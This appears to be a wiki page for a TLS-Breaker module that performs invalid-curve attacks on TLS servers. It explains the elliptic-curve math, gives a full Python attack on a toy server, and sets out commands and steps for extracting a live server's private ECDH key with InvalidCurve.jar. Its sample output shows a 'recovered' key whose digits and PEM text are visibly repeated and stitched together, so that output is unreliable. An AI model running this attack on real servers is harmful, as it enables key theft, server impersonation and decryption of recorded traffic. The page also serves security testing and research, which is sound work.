
Invalid Curve Attack

subramanya-shetty edited this page Sep 14, 2022 · 12 revisions

Elliptic curve cryptography (ECC) works in a cyclic group whose elements are points on an elliptic curve defined over a finite field. In an elliptic curve Diffie-Hellman key exchange, the client sends the server a point (its public key, a scalar multiple of the curve's generator), and the server derives the shared secret by multiplying the received point with its private scalar.

The attack is called an invalid curve attack because the attacker sends points that do not lie on the agreed curve. The usual addition and doubling formulas for short Weierstrass curves use the coefficient a but never b, so a server that does not validate the received point carries out the scalar multiplication on a different curve (same a, different b) which the attacker chose because it has a point of small order. The server's result then lies in a small subgroup, and the attacker can guess the resulting shared point by brute force, which reveals the private scalar modulo that small order. Repeating this with points of several different small orders and combining the residues with the Chinese remainder theorem recovers the whole private key.

If an implementation accepts elliptic curve points from an invalid curve, it is vulnerable to an invalid curve attack and the server's private key can be extracted. The attack requires the server to reuse the same private scalar across handshakes: this is the case for static ECDH cipher suites (TLS_ECDH_*), and for ECDHE implementations that cache their ephemeral key instead of generating a fresh one per connection.

The invalid curve attack in TLS-Breaker sends invalid points to the server and tries to complete a valid handshake with them. If the handshake succeeds, the implementation accepted the invalid point and is vulnerable. If the server rejects the incoming point, it is not vulnerable.
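To make the mechanism and the check concrete, the following Python example (added here; it is not TLS-Breaker code and uses a constructed toy curve far too small for real use) runs the attack against a simulated ECDH responder that multiplies whatever point it receives by its static private scalar d, and then against one that validates the point first. The x-coordinate of the shared point is fed into an HMAC standing in for the Finished message, so the attacker's guesses are checked the way a handshake would check them. The names Server, recover_private_key and small_order_points are this example's own, not the tool's.

```python
# Invalid-curve attack on a toy ECDH responder (constructed example, not TLS-Breaker code)
import hashlib
import hmac
from itertools import product

p, a = 10007, 2    # prime field (p % 4 == 3 makes sqrt a single pow); curve y^2 = x^3 + a*x + b


def add(P, Q):
    """Affine short-Weierstrass addition: the coefficient b never appears."""
    if P is None or Q is None:
        return Q if P is None else P
    (x1, y1), (x2, y2) = P, Q
    if x1 == x2 and (y1 + y2) % p == 0:
        return None                                   # P + (-P) = point at infinity
    lam = (3 * x1 * x1 + a) * pow(2 * y1, -1, p) if P == Q else (y2 - y1) * pow(x2 - x1, -1, p)
    x3 = (lam * lam - x1 - x2) % p
    return x3, (lam * (x1 - x3) - y1) % p


def mul(k, P):
    """Double-and-add; the server runs this with no idea which curve P is on."""
    R = None
    while k:
        if k & 1:
            R = add(R, P)
        P, k = add(P, P), k >> 1
    return R


def curve_order(b):
    """#E(F_p) = p + 1 + sum over x of the Legendre symbol of x^3 + a*x + b."""
    return p + 1 + sum((0 if v % p == 0 else 1 if pow(v, (p - 1) // 2, p) == 1 else -1)
                       for v in (x * x * x + a * x + b for x in range(p)))


def some_point(b):
    """First affine point on y^2 = x^3 + a*x + b (square root via p % 4 == 3)."""
    for x in range(p):
        rhs = (x * x * x + a * x + b) % p
        y = pow(rhs, (p + 1) // 4, p)
        if y * y % p == rhs:
            return x, y


def on_curve(P, b):
    """The validation a hardened server runs before touching a received point."""
    return P is not None and (P[1] ** 2 - P[0] ** 3 - a * P[0] - b) % p == 0


def is_prime(m):
    return m > 1 and all(m % q for q in range(2, int(m ** 0.5) + 1))


# The "real" curve: choose b so that #E is prime, then any point generates the group.
b = next(c for c in range(1, p) if (4 * a ** 3 + 27 * c * c) % p and is_prime(curve_order(c)))
n, G = curve_order(b), some_point(b)


def finished_tag(point, transcript):
    """Stand-in for the TLS Finished MAC: keys derive from the shared x-coordinate only."""
    secret = b"\x00" if point is None else point[0].to_bytes(2, "big")
    return hmac.new(secret, transcript, hashlib.sha256).digest()


class Server:
    """ECDH responder with a static key d; validate=False is the vulnerable behaviour."""

    def __init__(self, d, validate):
        self.d, self.validate, self.public = d, validate, mul(d, G)

    def key_exchange(self, client_point, transcript):
        if self.validate and not on_curve(client_point, b):
            raise ValueError("client point is not on the curve")
        return finished_tag(mul(self.d, client_point), transcript)


def small_order_points(bound):
    """Points of distinct small prime order q on curves that share a but not b,
    until the product of the q's exceeds bound (so the CRT pins d down)."""
    found, M = set(), 1
    for b2 in range(p):
        if M > bound:
            return
        if b2 == b or (4 * a ** 3 + 27 * b2 * b2) % p == 0:   # skip the real and singular curves
            continue
        N = curve_order(b2)
        for q in (2, 3, 5, 7, 11, 13, 17, 19, 23):
            if q not in found and N % q == 0:
                P = mul(N // q, some_point(b2))       # order exactly q unless we were unlucky
                if P is not None:
                    found.add(q)
                    M *= q
                    yield q, P


def recover_private_key(server, transcript=b"constructed handshake transcript"):
    """Returns d for a server that accepts invalid points, None for one that rejects them."""
    residues = []                                     # (q, {candidates for d mod q})
    try:
        for q, P in small_order_points(n):
            tag = server.key_exchange(P, transcript)
            k = next(k for k in range(q)
                     if hmac.compare_digest(finished_tag(mul(k, P), transcript), tag))
            residues.append((q, {k, (q - k) % q}))   # x alone reveals d mod q only up to sign
    except ValueError:
        return None
    for signs in product(*[sorted(r) for _, r in residues]):   # CRT for every sign choice
        d, M = 0, 1
        for (q, _), r in zip(residues, signs):
            d, M = d + M * ((r - d) * pow(M, -1, q) % q), M * q
        if mul(d, G) == server.public:                # the public key settles the signs
            return d
    return None


if __name__ == "__main__":
    d = 1234
    print("vulnerable server leaked d:", recover_private_key(Server(d, validate=False)) == d)
    print("hardened server leaked d:", recover_private_key(Server(d, validate=True)))
```

Because TLS keys depend only on the x-coordinate, each query gives d mod q only up to sign; the example tries every sign combination in the CRT step and keeps the candidate that reproduces the server's public key. The hardened check shown is sufficient for a prime-order curve; on a curve with a cofactor an implementation must additionally confirm that n*P is the point at infinity (or fold the cofactor into the multiplication). Python 3.8 or later is needed for pow(x, -1, p).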

For more information on this topic, refer to the paper linked below.

https://www.nds.ruhr-uni-bochum.de/media/nds/veroeffentlichungen/2015/09/14/main-full.pdf

Command

java -jar InvalidCurve.jar  -pcap (PCAP file name)

OR

java -jar InvalidCurve.jar  -connect (Server to connect)

Parameters/Options

-cipher:
  TLS cipher suites to use, divided by a comma. 
  e.g. TLS_RSA_WITH_AES_128_CBC_SHA,TLS_RSA_WITH_AES_256_CBC_SHA
-config
  This parameter allows you to specify a default TlsConfig
-connect
  Who to connect to. Syntax: localhost:4433
-curve_field_size
  Curve field size in bytes; 32 works for 256-bit curves.
  Default: 32
-debug
  Show extra debug output (sets logLevel to DEBUG)
  Default: false
-ephemeral
  If set to true, the attack is attempted with ephemeral cipher suites (ECDHE).
  Default: false
-executeAttack, -execute_attack
  If set, the attack is not only tested for but actually executed
  (WARNING)
  Default: false
-h, -help
  Prints usage for all the existing commands.
-key_offset
  Offset of the first secret key to attempt
  Default: 0
-keylogfile
  Path to the keylogfile
-named_curve
  Named curve to be used
  Default: SECP256R1
  Possible Values: [SECT163K1, SECT163R1, SECT163R2, SECT193R1, SECT193R2, SECT233K1, SECT233R1, SECT239K1, SECT283K1, SECT283R1, SECT409K1, SECT409R1, SECT571K1, SECT571R1, SECP160K1, SECP160R1, SECP160R2, SECP192K1, SECP192R1, SECP224K1, SECP224R1, SECP256K1, SECP256R1, SECP384R1, SECP521R1, BRAINPOOLP256R1, BRAINPOOLP384R1, BRAINPOOLP512R1, ECDH_X25519, ECDH_X448, FFDHE2048, FFDHE3072, FFDHE4096, FFDHE6144, FFDHE8192, EXPLICIT_PRIME, EXPLICIT_CHAR2, GREASE_00, GREASE_01, GREASE_02, GREASE_03, GREASE_04, GREASE_05, GREASE_06, GREASE_07, GREASE_08, GREASE_09, GREASE_10, GREASE_11, GREASE_12, GREASE_13, GREASE_14, GREASE_15]
-pcap
  Location of the pcap file that will be used for the Invalid Curve
  Attack.
-point_format
  The format used for the public key
  Default: UNCOMPRESSED
  Possible Values: [UNCOMPRESSED, ANSIX962_COMPRESSED_PRIME, ANSIX962_COMPRESSED_CHAR2]
-protocol_flows
  Number of Protocol flows
  Default: 15
-quiet
  No output (sets logLevel to NONE)
  Default: false
-renegotiation
  If set to true, the attack will be carried out in a renegotiation handshake
  Default: false
-server_name
  Server name for the SNI extension.
-server_type
  Allows switching between a normal vulnerable server type and an Oracle
  server type (the oracle needs a slightly different algorithm).
  Default: NORMAL
  Possible Values: [NORMAL, ORACLE]
-skipConnectionCheck, -skip_connection_check
  If set to true, the Attacker will not check if the target is reachable.
  Default: false
-starttls
  Starttls protocol
  Default: NONE
  Possible Values: [NONE, FTP, IMAP, POP3, SMTP]
-version
  Highest supported protocol version
  Possible Values: [SSL2, SSL3, TLS10, TLS11, TLS12, TLS13, TLS13_DRAFT14, TLS13_DRAFT15, TLS13_DRAFT16, TLS13_DRAFT17, TLS13_DRAFT18, TLS13_DRAFT19, TLS13_DRAFT20, TLS13_DRAFT21, TLS13_DRAFT22, TLS13_DRAFT23, TLS13_DRAFT24, TLS13_DRAFT25, TLS13_DRAFT26, TLS13_DRAFT27, TLS13_DRAFT28, DTLS10, DTLS12, GREASE_00, GREASE_01, GREASE_02, GREASE_03, GREASE_04, GREASE_05, GREASE_06, GREASE_07, GREASE_08, GREASE_09, GREASE_10, GREASE_11, GREASE_12, GREASE_13, GREASE_14, GREASE_15]

Example

Running the attack based on the recorded connections stored in "Sample_pcap.pcapng":

 java -jar InvalidCurve.jar -pcap "Sample_pcap.pcapng" -named_curve SECP521R1

Attacking a known server that uses SECP521R1 (here localhost:4433):

 java -jar InvalidCurve.jar -connect localhost:4433 -named_curve SECP521R1 -executeAttack

Execution of the attack

Part 1:

Ensure that the target server is up and running.

Part 2:

  1. Open a terminal in the "apps" folder.
  2. Run one of the commands from the Command section.

Part 3:

Running the command with the "-connect" option starts the attack directly. Wait for the attack to finish; it can take a while.

OR

Running the command with a pcap file displays the list of servers found in the capture that may be vulnerable to the invalid curve attack.

If exactly one server is found, you are asked directly whether to check it:

Found 1 server from the pcap file.
┌─────────────┬────────────────────┬────────────────────────────────────────────────┐
│Server Number│Host Address        │Hostname                                        │
├─────────────┼────────────────────┼────────────────────────────────────────────────┤
│            1│127.0.0.1:4433      │-                                               │
│             │                    │                                                │
└─────────────┴────────────────────┴────────────────────────────────────────────────┘
Do you want to check the vulnerability of the server? (y/n):

If two or more servers are found, you can select one server from the list to check, or check all of them by selecting option "a".

Vulnerability check:

Selecting a server starts the vulnerability check for that server.

If the server is vulnerable, you are asked whether to start the attack or stop.

Selecting 'y' starts the attack; selecting 'n' exits.

After selecting 'y', wait for the attack to finish; it can take a little time.

Output

The server's private key is printed together with the number of server queries and the time the attack needed. The key is shown both as a plain integer (the private scalar) and PEM-encoded.

 Number of server queries: 12768
 The time needed for the attack: 209 seconds
 Resulting plain private key: 2240907000157139574000861657719155206999610426911206999610426911222409070001571395740008616577191552
 Resulting encoded private key:
 -----BEGIN PRIVATE KEY-----
 MGACAQAwEAYHKoZIzj0CAQYFK4EEACMESTBHAgEBBEIApyJtQE67vtKYOiKRZAsJ
 K4EEACMESTBHAgEBBEIApyJtQE67vtKYOiKRZAsJMGACAQAwEAYHKoZIzj0CAQ0=
 -----END PRIVATE KEY-----

The recovered private key is the server's long-term key. With it an attacker can generate valid server signatures and impersonate the server, and can decrypt recorded sessions that used static ECDH with that key.
